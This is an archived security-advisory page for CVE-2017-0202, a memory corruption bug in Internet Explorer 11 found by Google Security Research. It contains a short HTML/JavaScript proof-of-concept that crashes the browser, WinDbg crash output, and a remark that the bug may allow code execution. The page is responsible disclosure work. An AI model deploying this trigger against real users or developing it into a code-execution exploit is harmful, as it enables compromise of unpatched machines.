Exploit the possiblities

Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption

Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption
Posted Apr 27, 2017
Authored by Ivan Fratric, Google Security Research

There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability was confirmed on version 11.576.14393.0 (update version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.

tags | exploit
systems | windows
advisories | CVE-2017-0202
MD5 | c84b10c1134ad272ca9b6c3a6c0ca2ff

Microsoft Internet Explorer CStyleSheetArray::BuildListOfMatchedRules Memory Corruption

Change Mirror Download
 Microsoft IE: Memory corruption in CStyleSheetArray::BuildListOfMatchedRules 

CVE-2017-0202


There is a memory corruption vulnerability in Internet Explorer. The vulnerability was confirmed on Internet Explorer Version 11.576.14393.0 (Update Version 11.0.38) running on Windows 10 64-bit with page heap enabled for iexplore.exe process.

PoC:

===========================================================

<!-- saved from url=(0014)about:internet -->
<style>
#details { transition-duration: 61s; }
</style>
<script>
function go() {
document.fgColor = "foo";
m.setAttribute("foo", "bar");
document.head.innerHTML = "a";
}
</script>
<body onload=go()>
<details id="details">
<summary style="transform: scaleY(4)">
<marquee id="m" bgcolor="rgb(135,114,244)">aaaaaaaaaaaaa</marquee>
<style></style>

===========================================================

The crash happens in CStyleSheetArray::BuildListOfMatchedRules while attempting to read memory outside of the bounds of the object pointed by eax (possibly due to a type confusion issue, but I didn't investigate in detail). If that read is successful and attacker-controlled address is read into edi, this down the line leads to a write at the attacker controlled address in CStyleSheetArray::BuildListOfProbableRules. Thus it might be possible to turn the issue into code execution.

Debug info:

(d10.1504): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????

0:021> r
eax=0fb60f78 ebx=0b124940 ecx=00000006 edx=00000000 esi=0b124940 edi=173de770
eip=71eb1137 esp=173dda30 ebp=173ddaa4 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77:
71eb1137 8bb824010000 mov edi,dword ptr [eax+124h] ds:002b:0fb6109c=????????

0:021> k
# ChildEBP RetAddr
00 173ddaa4 71eb3674 MSHTML!CStyleSheetArray::BuildListOfMatchedRules+0x77
01 173ddd6c 71eb041e MSHTML!CElement::ApplyStyleSheets+0x504
02 173ddd9c 720b43e5 MSHTML!CElement::ApplyDefaultFormat+0x8e
03 173de1b0 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0xe25
04 173de248 720b343a MSHTML!CElement::ComputeFormats+0x374
05 173de274 720b36cd MSHTML!CFormatInfo::FindFormattingParent+0x45a
06 173de690 71edf524 MSHTML!CElement::ComputeFormatsVirtual+0x10d
07 173de738 71ede88b MSHTML!CElement::ComputeFormats+0x374
08 173de754 71ede3c4 MSHTML!CTreeNode::ComputeFormats+0x6b
09 173df3b0 722e4e79 MSHTML!CTreeNode::ComputeFormatsHelper+0x34
0a 173df3b8 7201745c MSHTML!CTreeNode::GetSvgFormatHelper+0xa
0b 173df3c0 72756588 MSHTML!Tree::Style::HasCompositionItems+0x26
0c 173df3cc 72787473 MSHTML!Layout::InlineLayout::HasCompositionItems+0x28
0d 173df5dc 72788c30 MSHTML!CDispScroller::CalcScrollBits+0x526
0e 173df6c8 72246c2a MSHTML!CDispScroller::InvalidateScrollDelta+0x147
0f 173df6f4 71d8174e MSHTML!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xf8a1a
10 173df710 71d81667 MSHTML!CRenderTaskApplyPSP::ProcessScrollerUpdateRequests+0x34
11 173df740 71f0e9bb MSHTML!CRenderTaskApplyPSP::Execute+0xe7
12 173df79c 71de27d3 MSHTML!CRenderThread::RenderThread+0x31b
13 173df7ac 72fa17cd MSHTML!CRenderThread::StaticRenderThreadProc+0x23
14 173df7e4 74c362c4 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x8d
15 173df7f8 77700fd9 KERNEL32!BaseThreadInitThunk+0x24
16 173df840 77700fa4 ntdll!__RtlUserThreadStart+0x2f
17 173df850 00000000 ntdll!_RtlUserThreadStart+0x1b


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: ifratric

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    4 Files
  • 19
    Nov 19th
    2 Files
  • 20
    Nov 20th
    9 Files
  • 21
    Nov 21st
    14 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close